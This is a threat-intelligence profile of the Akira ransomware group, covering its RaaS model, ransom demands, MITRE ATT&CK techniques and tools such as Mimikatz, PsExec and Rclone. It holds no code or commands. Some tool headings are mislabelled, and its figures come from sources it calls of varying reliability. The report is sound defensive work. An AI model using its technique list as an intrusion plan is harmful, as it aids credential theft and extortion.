Overview and latest claimed attacks

The ransomware group akira began drawing cybersecurity community attention in early 2023, targeting organizations of various sizes and sectors. According to OSINT sources and specialized blogs, akira employs double-extortion tactics, encrypting data and threatening public release to coerce victims into paying ransoms in cryptocurrency.

Structurally, akira operatea as a Ransomware-as-a-Service (RaaS) model: a central “core team” develops and updates the malware, while external affiliates deploy it and negotiate with victims. Among the most recent claimed attacks are organizations in the healthcare and industrial sectors, involving sensitive data breaches and ransom demands of varying amounts.

Group history and interactions with other ransomware actors

From initial sightings, akira emerged as a seemingly new actor, with no obvious ties to more established groups like Conti, REvil, or Trickbot. However, some researchers have noted resemblances to components used by Babuk or older LockBit loaders, suggesting possible collaboration or purchase of kits and exploits through underground forums.

 

Links to other ransomware groups

  • There is no concrete evidence that akira directly descends from disbanded groups such as Conti or REvil.
  • Discussions on XSS Forum and BreachForums hint at tool-sharing between akira affiliates and smaller ransomware operators.

 

Collaborations, tool sharing, and internal conflict

  • akira seems to acquire exploits and tools from dark web marketplaces, sharing portions of their gains with sellers or distribution networks.
  • No major internal conflict has been reported, although some affiliate complaints—concerning delayed ransom payouts—have surfaced on cybercrime Telegram channels.

 

Financial data & ransom demands

Amounts demanded

  • average ransoms: USD 150.000 – 400.000 in cryptocurrency
  • known maximum demands: up to USD 1 million

Currencies used

  • primarily Bitcoin (BTC)
  • occasional use of Monero (XMR) for greater anonymity

Negotiation strategies

  • double extortion: threat of data publication
  • use of leak sites with countdowns for public exposure

Estimated total revenue

  • precise earnings are unknown; some estimates suggest potential revenue exceeding USD 3 million

 

Techniques employed

Advanced Phishing (Spear Phishing)

  • Targeted emails and malicious attachments aimed at key personnel.
  • MITRE ATT\&CK: T1566

VPN/RDP Exploitation

  • Exploitation of weak credentials or known VPN/RDP vulnerabilities.
  • MITRE ATT\&CK: T1190

Execution & Propagation techniques

  • Use of scripts to quietly download and deploy payloads.
  • MITRE ATT\&CK: T1059

Living-off-the-Land Tools

  • Leveraging PsExec and WMI for lateral movement.
  • MITRE ATT\&CK: T1047

Persistence techniques

  • Creating registry keys or startup entries.
  • MITRE ATT\&CK: T1547

Compromised accounts

  • Creating high-privileged user accounts.
  • MITRE ATT\&CK: T1078

 

Exfiltration & data destruction techniques

Data Transfer to third-party servers (SFTP, FTP)

  • Uploading stolen files to untracked hosting platforms.
  • MITRE ATT\&CK: T1041

File encryption & backup deletion

  • Removing local and network backups to enforce ransom payment.
  • MITRE ATT\&CK: T1486

 

Tools

Remote Access tools (RATs)

  • Remcos RAT: Remote control of infected systems.
  • NanoCore: In some cases used as secondary payloads for keylogging or credential theft.

 

Ransomware payloads & encryption tools

Remote Access tools (RATs)

  • akira Payload: Custom variants with obfuscated code and proprietary packing.
  • Possible Additional Modules: Plugins designed for network reconnaissance (unconfirmed).

 

Lateral Movement Tools

Remote Access tools (RATs)

  • PsExec: For deploying ransomware executables remotely.
  • Mimikatz: For credential harvesting and Windows network dissemination.

 

Data Exfiltration Tools

Remote Access tools (RATs)

  • Rclone: Secure transfer of exfiltrated data to cloud storage.
  • Wget/PowerShell: Used for stealthy downloading/executing of support scripts.

 

Living-off-the-Land Tools

Remote Access tools (RATs)

  • PowerShell: Widely used for stealthy script execution.
  • WMIC: To launch processes and monitor remote host activity.


Note: the information in this report is sourced from materials of varying reliability and may evolve over time. We will update regularly to provide the most accurate view of the akira ransomware group’s activities.